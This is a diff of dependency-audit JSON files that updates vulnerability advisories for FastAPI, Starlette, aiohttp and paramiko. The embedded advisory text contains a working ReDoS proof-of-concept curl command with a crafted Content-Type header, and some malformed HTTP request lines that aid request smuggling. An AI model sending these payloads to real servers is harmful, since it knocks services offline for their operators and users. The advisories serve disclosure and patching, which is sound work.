affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "starlette", + "purl": "pkg:pypi/starlette" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.36.2" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", + "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", + "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", + "0.13.0", + "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", + "0.14.0", + "0.14.1", + "0.14.2", + "0.15.0", + "0.16.0", + "0.17.0", + "0.17.1", + "0.18.0", + "0.19.0", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", + "0.20.0", + "0.20.1", + "0.20.2", + "0.20.3", + "0.20.4", + "0.21.0", + "0.22.0", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", + "0.4.1", + "0.4.2", + "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.7.0", + "0.7.1", + "0.7.2", + "0.7.3", + "0.7.4", + "0.8.0", + "0.8.1", + "0.8.2", + "0.8.3", + "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", + "0.9.0", + "0.9.1", + "0.9.10", + "0.9.11", + "0.9.2", + "0.9.3", + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" + }, + { + "type": "WEB", + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" + }, + { + "type": "WEB", + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" + }, + { + "type": "PACKAGE", + "url": "https://github.com/encode/starlette" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-93gm-qmq6-w238" + ], + "aliases": [ + "GHSA-93gm-qmq6-w238" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/ssh-mitm-requirements.audit.json b/audits/ssh-mitm-requirements.audit.json index 95de2360..037f49a0 100644 --- a/audits/ssh-mitm-requirements.audit.json +++ b/audits/ssh-mitm-requirements.audit.json @@ -139,7 +139,7 @@ ], "vulnerabilities": [ { - "modified": "2024-01-29T09:46:53Z", + "modified": "2024-02-05T23:31:03Z", "published": "2023-12-18T19:22:09Z", "schema_version": "1.6.0", "id": "GHSA-45x7-px36-x8w8", @@ -207,7 +207,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" @@ -216,108 +216,6 @@ } ], "versions": [ - "0.1-bulbasaur", - "0.1-charmander", - "0.9-doduo", - "0.9-eevee", - "0.9-fearow", - "0.9-gyarados", - "0.9-horsea", - "0.9-ivysaur", - "1.0", - "1.1", - "1.10.0", - "1.10.1", - "1.10.2", - "1.10.3", - "1.10.4", - "1.10.5", - "1.10.6", - "1.10.7", - "1.11.0", - "1.11.1", - "1.11.2", - "1.11.3", - "1.11.4", - "1.11.5", - "1.11.6", - "1.12.0", - "1.12.1", - "1.12.2", - "1.12.3", - "1.12.4", - "1.13.0", - "1.13.1", - "1.13.2", - "1.13.3", - "1.13.4", - "1.14.0", - "1.14.1", - "1.14.2", - "1.14.3", - "1.15.0", - "1.15.1", - "1.15.2", - "1.15.3", - "1.15.4", - "1.15.5", - "1.16.0", - "1.16.1", - "1.16.2", - "1.16.3", - "1.17.0", - "1.17.1", - "1.17.2", - "1.17.3", - "1.17.4", - "1.17.5", - "1.17.6", - "1.18.0", - "1.18.1", - "1.18.2", - "1.18.3", - "1.18.4", - "1.18.5", - "1.2", - "1.3", - "1.3.1", - "1.4", - "1.5.1", - "1.5.2", - "1.5.4", - "1.6", - "1.6.1", - "1.6.2", - "1.6.3", - "1.6.4", - "1.7", - "1.7.1", - "1.7.2", - "1.7.4", - "1.7.5", - "1.7.6", - "1.7.7.1", - "1.7.7.2", - "1.8.0", - "1.8.1", - "1.9.0", - "2.0.0", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.0.8", - "2.0.9", - "2.1.0", - "2.1.1", - "2.1.2", - "2.1.3", - "2.1.4", - "2.1.5", - "2.1.6", "2.10.0", "2.10.1", "2.10.2", @@ -328,19 +226,6 @@ "2.11.0", "2.11.1", "2.12.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.3.0", - "2.3.1", - "2.3.2", - "2.3.3", - "2.4.0", - "2.4.1", - "2.4.2", - "2.4.3", "2.5.0", "2.5.1", "2.6.0", @@ -409,6 +294,10 @@ "type": "WEB", "url": "https://github.com/paramiko/paramiko/issues/2337" }, + { + "type": "WEB", + "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773" + }, { "type": "WEB", "url": "https://github.com/proftpd/proftpd/issues/456" diff --git a/audits/theharvester-requirements.audit.json b/audits/theharvester-requirements.audit.json index fcc588c6..c20cdd92 100644 --- a/audits/theharvester-requirements.audit.json +++ b/audits/theharvester-requirements.audit.json @@ -1,8 +1,8 @@ [ { "package": { - "name": "aiohttp", - "version": "3.9.1", + "name": "fastapi", + "version": "0.109.0", "ecosystem": "PyPI" }, "dependency_groups": [ @@ -10,241 +10,305 @@ ], "vulnerabilities": [ { - "modified": "2024-02-05T03:46:53Z", - "published": "2024-01-29T22:31:03Z", + "modified": "2024-02-05T17:28:33Z", + "published": "2024-02-05T17:01:54Z", "schema_version": "1.6.0", - "id": "GHSA-5h86-8mv2-jq9f", + "id": "GHSA-qf9m-vfgh-m389", "aliases": [ - "CVE-2024-23334" + "CVE-2024-24762" ], - "summary": "aiohttp is vulnerable to directory traversal", - "details": "### Summary\nImproperly configuring static resource resolution in aiohttp when used as a web server can result in the unauthorized reading of arbitrary files on the system.\n\n### Details\nWhen using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if a given file path is within the root directory.This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present.\n\ni.e. An application is only vulnerable with setup code like:\n```\napp.router.add_routes([\n web.static(\"/static\", \"static/\", follow_symlinks=True), # Remove follow_symlinks to avoid the vulnerability\n])\n```\n\n### Impact\nThis is a directory traversal vulnerability with CWE ID 22. When using aiohttp as a web server and enabling static resource resolution with `follow_symlinks` set to True, it can lead to this vulnerability. This vulnerability has been present since the introduction of the `follow_symlinks` parameter.\n\n### Workaround\nEven if upgrading to a patched version of aiohttp, we recommend following these steps regardless.\n\nIf using `follow_symlinks=True` outside of a restricted local development environment, disable the option immediately. This option is NOT needed to follow symlinks which point to a location _within_ the static root directory, it is _only_ intended to allow a symlink to break out of the static directory. Even with this CVE fixed, there is still a substantial risk of misconfiguration when using this option on a server that accepts requests from remote users.\n\nAdditionally, aiohttp has always recommended using a reverse proxy server (such as nginx) to handle static resources and _not_ to use these static resources in aiohttp for production environments. Doing so also protects against this vulnerability, and is why we expect the number of affected users to be very low.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8079/files", + "summary": "FastAPI Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\nThis is also reported to Starlette at: https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n\n### PoC\n\nCreate a FastAPI app that uses form data:\n\n```Python\n# main.py\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", "affected": [ { "package": { "ecosystem": "PyPI", - "name": "aiohttp", - "purl": "pkg:pypi/aiohttp" + "name": "fastapi", + "purl": "pkg:pypi/fastapi" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.0.5" + "introduced": "0" }, { - "fixed": "3.9.2" + "fixed": "0.109.1" } ] } ], "versions": [ - "1.0.5", - "1.1.0", - "1.1.1", - "1.1.2", - "1.1.3", - "1.1.4", - "1.1.5", - "1.1.6", - "1.2.0", - "1.3.0", - "1.3.1", - "1.3.2", - "1.3.3", - "1.3.4", - "1.3.5", - "2.0.0", - "2.0.0rc1", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.1.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.2.5", - "2.3.0", - "2.3.0a1", - "2.3.0a2", - "2.3.0a3", - "2.3.0a4", - "2.3.1", - "2.3.10", - "2.3.1a1", - "2.3.2", - "2.3.2b2", - "2.3.2b3", - "2.3.3", - "2.3.4", - "2.3.5", - "2.3.6", - "2.3.7", - "2.3.8", - "2.3.9", - "3.0.0", - "3.0.0b0", - "3.0.0b1", - "3.0.0b2", - "3.0.0b3", - "3.0.0b4", - "3.0.1", - "3.0.2", - "3.0.3", - "3.0.4", - "3.0.5", - "3.0.6", - "3.0.7", - "3.0.8", - "3.0.9", - "3.1.0", - "3.1.1", - "3.1.2", - "3.1.3", - "3.2.0", - "3.2.1", - "3.3.0", - "3.3.0a0", - "3.3.1", - "3.3.2", - "3.3.2a0", - "3.4.0", - "3.4.0a0", - "3.4.0a3", - "3.4.0b1", - "3.4.0b2", - "3.4.1", - "3.4.2", - "3.4.3", - "3.4.4", - "3.5.0", - "3.5.0a1", - "3.5.0b1", - "3.5.0b2", - "3.5.0b3", - "3.5.1", - "3.5.2", - "3.5.3", - "3.5.4", - "3.6.0", - "3.6.0a0", - "3.6.0a1", - "3.6.0a11", - "3.6.0a12", - "3.6.0a2", - "3.6.0a3", - "3.6.0a4", - "3.6.0a5", - "3.6.0a6", - "3.6.0a7", - "3.6.0a8", - "3.6.0a9", - "3.6.0b0", - "3.6.1", - "3.6.1b3", - "3.6.1b4", - "3.6.2", - "3.6.2a0", - "3.6.2a1", - "3.6.2a2", - "3.6.3", - "3.7.0", - "3.7.0b0", - "3.7.0b1", - "3.7.1", - "3.7.2", - "3.7.3", - "3.7.4", - "3.7.4.post0", - "3.8.0", - "3.8.0a7", - "3.8.0b0", - "3.8.1", - "3.8.2", - "3.8.3", - "3.8.4", - "3.8.5", - "3.8.6", - "3.9.0", - "3.9.0b0", - "3.9.0b1", - "3.9.0rc0", - "3.9.1" + "0.1.0", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.100.0", + "0.100.0b1", + "0.100.0b2", + "0.100.0b3", + "0.100.1", + "0.101.0", + "0.101.1", + "0.102.0", + "0.103.0", + "0.103.1", + "0.103.2", + "0.104.0", + "0.104.1", + "0.105.0", + "0.106.0", + "0.107.0", + "0.108.0", + "0.109.0", + "0.11.0", + "0.12.0", + "0.12.1", + "0.13.0", + "0.14.0", + "0.15.0", + "0.16.0", + "0.17.0", + "0.18.0", + "0.19.0", + "0.2.0", + "0.2.1", + "0.20.0", + "0.20.1", + "0.21.0", + "0.22.0", + "0.23.0", + "0.24.0", + "0.25.0", + "0.26.0", + "0.27.0", + "0.27.1", + "0.27.2", + "0.28.0", + "0.29.0", + "0.29.1", + "0.3.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.36.0", + "0.37.0", + "0.38.0", + "0.38.1", + "0.39.0", + "0.4.0", + "0.40.0", + "0.41.0", + "0.42.0", + "0.43.0", + "0.44.0", + "0.44.1", + "0.45.0", + "0.46.0", + "0.47.0", + "0.47.1", + "0.48.0", + "0.49.0", + "0.49.1", + "0.49.2", + "0.5.0", + "0.5.1", + "0.50.0", + "0.51.0", + "0.52.0", + "0.53.0", + "0.53.1", + "0.53.2", + "0.54.0", + "0.54.1", + "0.54.2", + "0.55.0", + "0.55.1", + "0.56.0", + "0.56.1", + "0.57.0", + "0.58.0", + "0.58.1", + "0.59.0", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.6.4", + "0.60.0", + "0.60.1", + "0.60.2", + "0.61.0", + "0.61.1", + "0.61.2", + "0.62.0", + "0.63.0", + "0.64.0", + "0.65.0", + "0.65.1", + "0.65.2", + "0.65.3", + "0.66.0", + "0.66.1", + "0.67.0", + "0.68.0", + "0.68.1", + "0.68.2", + "0.69.0", + "0.7.0", + "0.7.1", + "0.70.0", + "0.70.1", + "0.71.0", + "0.72.0", + "0.73.0", + "0.74.0", + "0.74.1", + "0.75.0", + "0.75.1", + "0.75.2", + "0.76.0", + "0.77.0", + "0.77.1", + "0.78.0", + "0.79.0", + "0.79.1", + "0.8.0", + "0.80.0", + "0.81.0", + "0.82.0", + "0.83.0", + "0.84.0", + "0.85.0", + "0.85.1", + "0.85.2", + "0.86.0", + "0.87.0", + "0.88.0", + "0.89.0", + "0.89.1", + "0.9.0", + "0.9.1", + "0.90.0", + "0.90.1", + "0.91.0", + "0.92.0", + "0.93.0", + "0.94.0", + "0.94.1", + "0.95.0", + "0.95.1", + "0.95.2", + "0.96.0", + "0.96.1", + "0.97.0", + "0.98.0", + "0.99.0", + "0.99.1" ], "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-5h86-8mv2-jq9f/GHSA-5h86-8mv2-jq9f.json" + "last_known_affected_version_range": "<= 0.109.0", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json" } } ], "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "references": [ { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f" + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" }, { "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23334" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" }, { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8079" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8079/files" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b" + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" }, { "type": "PACKAGE", - "url": "https://github.com/aio-libs/aiohttp" + "url": "https://github.com/tiangolo/fastapi" }, { "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" } ], "database_specific": { "cwe_ids": [ - "CWE-22" + "CWE-400" ], "github_reviewed": true, - "github_reviewed_at": "2024-01-29T22:31:03Z", - "nvd_published_at": "2024-01-29T23:15:08Z", - "severity": "MODERATE" + "github_reviewed_at": "2024-02-05T17:01:54Z", + "nvd_published_at": "2024-02-05T15:15:09Z", + "severity": "HIGH" } - }, + } + ], + "groups": [ { - "modified": "2024-02-05T03:47:10Z", - "published": "2024-01-29T22:30:07Z", - "schema_version": "1.6.0", - "id": "GHSA-8qpw-xqxj-h4r2", - "aliases": [ - "CVE-2024-23829" + "ids": [ + "GHSA-qf9m-vfgh-m389" ], - "summary": "aiohttp's HTTP parser (the python one, not llhttp) still overly lenient about separators", - "details": "### Summary\nSecurity-sensitive parts of the *Python HTTP parser* retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input.\n\n### Details\nThese problems are rooted in pattern matching protocol elements, previously improved by PR #3235 and GHSA-gfw2-4jvh-wgfg:\n\n1. The expression `HTTP/(\\d).(\\d)` lacked another backslash to clarify that the separator should be a literal dot, not just *any* Unicode code point (result: `HTTP/(\\d)\\.(\\d)`).\n\n2. The HTTP version was permitting Unicode digits, where only ASCII digits are standards-compliant.\n\n3. Distinct regular expressions for validating HTTP Method and Header field names were used - though both should (at least) apply the common restrictions of rfc9110 `token`.\n\n### PoC\n`GET / HTTP/1\u00f61`\n`GET / HTTP/1.\ud835\udfd9`\n`GET/: HTTP/1.1`\n`Content-Encoding?: chunked`\n\n### Impact\nPrimarily concerns running an aiohttp server without llhttp:\n 1. **behind a proxy**: Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling.\n 2. **directly accessible** or exposed behind proxies relaying malformed input: the unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8074/files", + "aliases": [ + "CVE-2024-24762", + "GHSA-qf9m-vfgh-m389" + ] + } + ] + }, + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "theharvester-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS 